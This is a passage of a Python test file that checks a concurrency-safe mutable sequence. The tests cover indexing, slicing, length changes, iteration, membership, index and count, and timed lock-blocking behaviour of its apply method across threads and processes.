'max_check_count': 1}), join=True ), execs.Im.ExecParams( func_or_obj_func=(cs_data, cs_data.c_set.__name__), params=((), {'new_val': INT_VAL}), join=True), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_get.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': INT_VAL})}), 'max_check_count': 1}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_apply.__name__), 'params_1': ((), { 'func': __apply_add_x }), 'el_2': ft.c_identity, 'params_2': ((), {'el': (__apply_add_x.__name__, INT_VAL)})}), 'max_check_count': 1}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_get.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': INT_VAL + ADD_X})}), 'max_check_count': 1}), join=True ) ], manager=fix_manager) if fix_csl > cs.En.CSL.SINGLE_THREAD: # noinspection PyArgumentList execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_apply.__name__), 'params_1': ((), { 'func': __apply_add_x_timeout }), 'el_2': ft.c_identity, 'params_2': ((), {'el': (__apply_add_x.__name__, INT_VAL + ADD_X)})}), 'max_check_count': 1}), join=False ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': (cs_data.c_get_csrwlock(), cs_data.c_get_csrwlock().c_is_held.__name__), 'params': ((), {}), 'max_duration': 1.0}), join=True), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_get.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': INT_VAL + 2 * ADD_X})}), 'max_check_count': 1}), join=True, min_sec=APPLY_TIMEOUT - 2.0, max_sec=APPLY_TIMEOUT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT, _max_sec=APPLY_TIMEOUT + 1.0) # noinspection PyArgumentList execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_apply.__name__), 'params_1': ((), { 'func': __apply_add_x_timeout }), 'el_2': ft.c_identity, 'params_2': ((), {'el': (__apply_add_x.__name__, INT_VAL + 2 * ADD_X)})}), 'max_check_count': 1}), join=False ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': (cs_data.c_get_csrwlock(), cs_data.c_get_csrwlock().c_is_held.__name__), 'params': ((), {}), 'max_duration': 1.0}), join=True), execs.Im.ExecDelayedParams( func_or_obj_func=(cs_data, cs_data.c_set.__name__), params=((), {'new_val': INT_VAL}), join=True, min_sec=APPLY_TIMEOUT - 2.0, max_sec=APPLY_TIMEOUT + 1.0 ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), {'condition_check': ft.c_eq, 'params': ((), {'el_1': (cs_data, cs_data.c_get.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), {'el': INT_VAL})}), 'max_check_count': 1}), join=True ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT, _max_sec=APPLY_TIMEOUT + 1.0) fix_exec.c_join() # noinspection PyArgumentList def test_csmseqdata_non_concurrent( fix_csl: cs.En.CSL, fix_init_csmseqdata: con.Pr.Iterable[Any], fix_manager: Optional[mp_mngr.SyncManager], fix_csmseq_factory: Callable[[cs.En.CSL, con.Pr.Iterable[TYPE], Optional[mp_mngr.SyncManager]], csdata.Pr.CSMutableSequence[TYPE]], fix_exec: execs.Im.Exec) -> None: fix_init_csmseqdata = tuple(fix_init_csmseqdata) init_len: Final[int] = len(fix_init_csmseqdata) assert init_len > 2 csmseq: csdata.Pr.CSMutableSequence[Any] = cast(csdata.Pr.CSMutableSequence[Any], fix_csmseq_factory(fix_csl, fix_init_csmseqdata, fix_manager)) # getitem int index for getitem_name in (csmseq.__getitem__.__name__, csmseq.c_get.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((init_len-1, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[init_len-1] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((-init_len, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[-init_len] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((0, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[0] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, getitem_name), 'params': ((init_len, ), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, getitem_name), 'params': ((-(init_len + 1), ), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, getitem_name), 'params': ((-(init_len + 10), ), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, getitem_name), 'params': ((init_len + 9, ), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # getitem slice index for getitem_name in (csmseq.__getitem__.__name__, csmseq.c_get.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(0, None), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(0, None), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[0:] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(1, 23), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[1:23] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(-100, 23), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[-100:23] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(-3, -1), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[-3:-1] }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, getitem_name), 'params_1': ((slice(-1, -3), ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata[-1:-3] }) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # setitem int index for setitem_name, offset in ((csmseq.__setitem__.__name__, 2), (csmseq.c_set.__name__, 1)): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=(csmseq, setitem_name), params=((init_len - offset, FILL_ELEM), {}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((init_len - offset, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': FILL_ELEM }) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # setitem int index for setitem_name, offset in ((csmseq.__setitem__.__name__, 2), (csmseq.c_set.__name__, 1)): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=(csmseq, setitem_name), params=((init_len - offset, FILL_ELEM), {}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((init_len - offset, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': FILL_ELEM }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=(csmseq, setitem_name), params=((-init_len, FILL_ELEM), {}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((-init_len, ), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': FILL_ELEM }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((init_len, "SOMEVAL"), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((-(init_len + 1), "SOMEVAL"), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # setitem slice - unchanged length for setitem_name in (csmseq.__setitem__.__name__, csmseq.c_set.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=(csmseq, setitem_name), params=((slice(1, 3), tuple(range(55, 57))), {}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((slice(1, 3),), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': tuple(range(55, 57)) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=(csmseq, setitem_name), params=((slice(-(init_len + 10000), 1), (1233123123123123123, )), {}), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((slice(-(init_len + 10000), 1),), None), 'el_2': ft.c_identity, 'params_2': ((), { 'el': (1233123123123123123,) }) }), 'max_check_count': 1 }), join=True ), ], manager=fix_manager) if not isinstance(csmseq, con.Pr.MutableLengthSequence): # setitem slice - changed length - expect IndexError for setitem_name in (csmseq.__setitem__.__name__, csmseq.c_set.__name__): execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((slice(1, 3), (33123123,)), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((slice(1, 2), (33123123, "asdfasdf")), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((slice(init_len, init_len + 1), (33123123, )), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, setitem_name), 'params': ((slice(-init_len - 10000, 0), (33123123, 3223123)), None), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # len execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__len__.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((len(fix_init_csmseqdata),), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((len(fix_init_csmseqdata),), None) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # reset csmseq[0:] = fix_init_csmseqdata assert (l := len(csmseq)) == len(fix_init_csmseqdata) and all(csmseq[i] == fix_init_csmseqdata[i] for i in range(l)) # iter and reversed execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__iter__.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': fix_init_csmseqdata }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__reversed__.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': reversed(fix_init_csmseqdata) }) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # contains execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': (csmseq, csmseq.__contains__.__name__), 'params': ((fix_init_csmseqdata[-1], ), None), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': (csmseq, csmseq.__contains__.__name__), 'params': ((fix_init_csmseqdata[1], ), None), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_not, 'params': ((), { 'condition_check': (csmseq, csmseq.__contains__.__name__), 'params': (("I AM CERTAINLY NOT CONTAINED",), None) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # index execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.index.__name__), 'params_1': ((fix_init_csmseqdata[0], ), None), 'el_2': ft.c_identity, 'params_2': ((0,), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.index.__name__), 'params_1': ((fix_init_csmseqdata[1], 1, 2), None), 'el_2': ft.c_identity, 'params_2': ((1,), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.index.__name__), 'params': (("I AM CERTAINLY NOT CONTAINED", 2, 44), None), 'expected_exception': ValueError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.index.__name__), 'params': ((fix_init_csmseqdata[0], init_len, init_len + 12), None), 'expected_exception': ValueError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) # count execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.count.__name__), 'params_1': ((fix_init_csmseqdata[2], ), None), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata.count(fix_init_csmseqdata[2]),), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.count.__name__), 'params_1': ((fix_init_csmseqdata[0],), None), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata.count(fix_init_csmseqdata[0]),), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.count.__name__), 'params_1': (("I AM CERTAINLY NOT CONTAINED",), None), 'el_2': ft.c_identity, 'params_2': ((0,), None) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) fix_exec.c_join() APPLY_RETURN: Final[str] = "APPLY_RETURN" APPLY_TIMEOUT_SHORT: Final[float] = 5.0 def __apply_to_str(old_val: Any) -> Tuple[Any, str]: return str(old_val), APPLY_RETURN def __apply_to_str_seq(old_vals: con.Pr.RandomAccess[Any]) -> Tuple[con.Pr.Iterable[Any], str]: return tuple(str(elem) for elem in con.Ca.c_to_itbl(obj=old_vals)), APPLY_RETURN def __apply_to_str_seq_incr_len(old_vals: con.Pr.RandomAccess[Any]) -> Tuple[con.Pr.Iterable[Any], str]: return tuple(str(elem) for elem in con.Ca.c_to_itbl(obj=old_vals)) + ("Nope",), APPLY_RETURN def __apply_to_str_seq_decr_len(old_vals: con.Pr.RandomAccess[Any]) -> Tuple[con.Pr.Iterable[Any], str]: assert len(old_vals) > 0 return tuple(str(old_vals[i]) for i in range(len(old_vals) - 1)), APPLY_RETURN def __apply_delay(old_val: Any) -> Tuple[Any, str]: time.sleep(APPLY_TIMEOUT_SHORT) return old_val, APPLY_RETURN def __apply_no_delay(old_val: Any) -> Tuple[Any, str]: return old_val, APPLY_RETURN @overload def __apply_helper(mseq: con.Pr.MutableSequence[TYPE], index: int, func: Callable[[TYPE], Tuple[TYPE, TYPE2]]) -> TYPE2: ... @overload def __apply_helper(mseq: con.Pr.MutableSequence[TYPE], index: slice, func: Callable[[con.Pr.RandomAccess[TYPE]], Tuple[con.Pr.Iterable[TYPE], TYPE2]]) -> TYPE2: ... def __apply_helper(mseq: con.Pr.MutableSequence[TYPE], index: Union[int, slice], func: Union[Callable[[con.Pr.RandomAccess[TYPE]], Tuple[con.Pr.Iterable[TYPE], TYPE2]], Callable[[TYPE], Tuple[TYPE, TYPE2]]]) -> TYPE2: if isinstance(index, int): func = cast(Callable[[TYPE], Tuple[TYPE, TYPE2]], func) old_vals = mseq[index] new_vals = func(old_vals) mseq[index] = new_vals[0] return new_vals[1] else: assert isinstance(index, slice) func = cast(Callable[[con.Pr.RandomAccess[TYPE]], Tuple[con.Pr.Iterable[TYPE], TYPE2]], func) old_vals_ = mseq[index] new_vals_ = func(old_vals_) mseq[index] = new_vals_[0] return new_vals_[1] # noinspection PyArgumentList def test_csmseqdata_concurrent_apply( fix_csl: cs.En.CSL, fix_init_csmseqdata: con.Pr.Iterable[Any], fix_manager: Optional[mp_mngr.SyncManager], fix_csmseq_factory: Callable[[cs.En.CSL, con.Pr.Iterable[TYPE], Optional[mp_mngr.SyncManager]], csdata.Pr.CSMutableSequence[TYPE]], fix_exec: execs.Im.Exec) -> None: fix_init_csmseqdata = tuple(fix_init_csmseqdata) init_len: Final[int] = len(fix_init_csmseqdata) assert init_len > 2 csmseq: csdata.Pr.CSMutableSequence[Any] = cast(csdata.Pr.CSMutableSequence[Any], fix_csmseq_factory(fix_csl, fix_init_csmseqdata, fix_manager)) # apply execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_to_str }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_get.__name__), 'params_1': ((0,), None), 'el_2': ft.c_identity, 'params_2': ((str(fix_init_csmseqdata[0]),), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': slice(1, 3), 'func': __apply_to_str_seq }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_get.__name__), 'params_1': ((slice(1, 3),), None), 'el_2': ft.c_identity, 'params_2': ((tuple(str(item) for item in fix_init_csmseqdata[1:3]),), None) }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) if not isinstance(csmseq, con.Pr.MutableLengthSequence): # apply length change execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': slice(1, 3), 'func': __apply_to_str_seq_incr_len }), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': slice(1, 3), 'func': __apply_to_str_seq_decr_len }), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager) if fix_csl > cs.En.CSL.SINGLE_THREAD: csmseq[0:] = fix_init_csmseqdata # test_blocking - apply execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_no_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - getitem execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__getitem__.__name__), 'params_1': ((0, ), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata[0],), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - c_get execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_get.__name__), 'params_1': ((0, ), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata[0],), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - setitem execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__setitem__.__name__), 'params_1': ((0, "A"), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmseq[0:] = fix_init_csmseqdata # test_blocking - c_set execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 